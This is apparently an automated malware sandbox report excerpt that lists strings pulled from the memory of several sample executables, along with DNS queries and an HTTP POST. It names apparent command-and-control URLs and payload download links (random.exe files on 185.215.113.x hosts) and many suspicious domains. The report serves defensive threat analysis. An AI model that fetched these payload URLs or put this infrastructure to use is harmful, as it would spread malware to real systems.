Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: y-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: warlikedbeliev.org
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: thebeautylovelytop.top
Source: global traffic	DNS traffic detected: DNS query: guardeduppe.com
Source: global traffic	DNS traffic detected: DNS query: toppyneedus.biz
Source: global traffic	DNS traffic detected: DNS query: DGGKjBirXBdcY.DGGKjBirXBdcY
Source: global traffic	DNS traffic detected: DNS query: breakfasutwy.cyou
Source: global traffic	DNS traffic detected: DNS query: bloodyswif.lat
Source: global traffic	DNS traffic detected: DNS query: washyceehsu.lat
Source: global traffic	DNS traffic detected: DNS query: leggelatez.lat
Source: global traffic	DNS traffic detected: DNS query: miniatureyu.lat
Source: global traffic	DNS traffic detected: DNS query: kickykiduz.lat
Source: global traffic	DNS traffic detected: DNS query: savorraiykj.lat
Source: global traffic	DNS traffic detected: DNS query: shoefeatthe.lat
Source: global traffic	DNS traffic detected: DNS query: finickypwk.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: getyour.cyou
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: srtb.msn.com
Source: global traffic	DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: trc.taboola.com
Source: global traffic	DNS traffic detected: DNS query: sync.outbrain.com
Source: global traffic	DNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: hbx.media.net
Source: global traffic	DNS traffic detected: DNS query: cm.mgid.com
Source: global traffic	DNS traffic detected: DNS query: eb2.3lift.com
Source: global traffic	DNS traffic detected: DNS query: code.yengo.com
Source: global traffic	DNS traffic detected: DNS query: visitor.omnitagjs.com
Source: global traffic	DNS traffic detected: DNS query: trace.mediago.io
Source: global traffic	DNS traffic detected: DNS query: trace.popin.cc
Source: global traffic	DNS traffic detected: DNS query: m.adnxs.com
Source: global traffic	DNS traffic detected: DNS query: ib.adnxs.com
Source: global traffic	DNS traffic detected: DNS query: sync.inmobi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org

Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/IFD
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/X
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001538000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php(
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/J
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php4
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php9
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115C
Source: DbCMTMgeJo.exe, 00000000.00000003.2210581252.0000000001764000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2210846669.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: DbCMTMgeJo.exe, 00000000.00000003.2210581252.0000000001764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/p
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5y
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7001
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpJ
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZ
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedC
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpf
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phphy~m0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpiz
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedv
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/lfons
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/Cyber_Yoda/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/Cyber_Yoda/random.exeR
Source: skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/asjduwgsgausi/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/c0dxnfz/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.0000000000840000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/fate/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/fate/random.exev
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/initlosizz198hyjdr/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/initlosizz198hyjdr/random.exe/
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/initlosizz198hyjdr/random.exe_
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/sawdu5t/random.exe
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/sawdu5t/random.exeJ
Source: skotes.exe, 00000007.00000002.4516129334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.97/files/sunnywebZ/random.exe
Source: svchost.exe, 0000000D.00000003.3462110348.000002877998A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3480434356.0000028779988000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852340836.0000028779978000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852276136.0000028779974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000000D.00000003.3480339684.0000028779982000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3464995870.0000028779985000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
Source: svchost.exe, 0000000D.00000003.3457046694.000002877996E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852340836.0000028779978000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2912345751.000002877A047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852276136.0000028779974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000000D.00000002.4520793494.00000287790A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000000D.00000002.4524036674.000002877A013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbpose
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 0000000D.00000002.4521059939.00000287790C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 0000000D.00000002.4523260235.0000028779982000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852276136.0000028779974000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3456972915.0000028779976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000000D.00000003.3456666325.0000028779931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd/gc=
Source: svchost.exe, 0000000D.00000002.4522283250.0000028779900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457085482.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3460335234.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3459770903.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3459005546.000002877990F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 0000000D.00000003.2866412955.0000028779974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000000D.00000003.3504200934.0000028779985000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3504115850.0000028779981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3480339684.0000028779982000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3456972915.0000028779976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 0000000D.00000003.2866412955.0000028779974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds(
Source: svchost.exe, 0000000D.00000002.4523260235.0000028779982000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utili
Source: svchost.exe, 0000000D.00000002.4523260235.0000028779982000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2852276136.0000028779974000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3456972915.0000028779976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000000D.00000003.2888481712.0000028779976000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
Source: svchost.exe, 0000000D.00000002.4522283250.0000028779900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457085482.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3460335234.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3459770903.000002877990E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3459005546.000002877990F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000000D.00000003.3456666325.0000028779931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdaReference
Source: svchost.exe, 0000000D.00000003.3504200934.0000028779985000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3504115850.0000028779981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2866412955.0000028779974000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3456972915.0000028779976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 0000000D.00000002.4521059939.00000287790C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: regsvr32.exe, 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: regsvr32.exe, 00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: regsvr32.exe, 00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3751914736.0000000014694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: 63460ff8c7.exe, 0000000E.00000000.2795087856.0000000000409000.00000002.00000001.01000000.00000010.sdmp, 63460ff8c7.exe, 0000000E.00000002.2803937759.0000000000409000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: svchost.exe, 0000000D.00000002.4524036674.000002877A013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4525190291.000002877A081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scheas.xmls
Source: svchost.exe, 0000000D.00000002.4522283250.0000028779900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457085482.000002877990E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svchost.exe, 0000000D.00000002.4522775338.000002877995F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4522775338.000002877995F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3465050245.0000028779982000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457046694.000002877996E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3504621249.000002877996E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyt
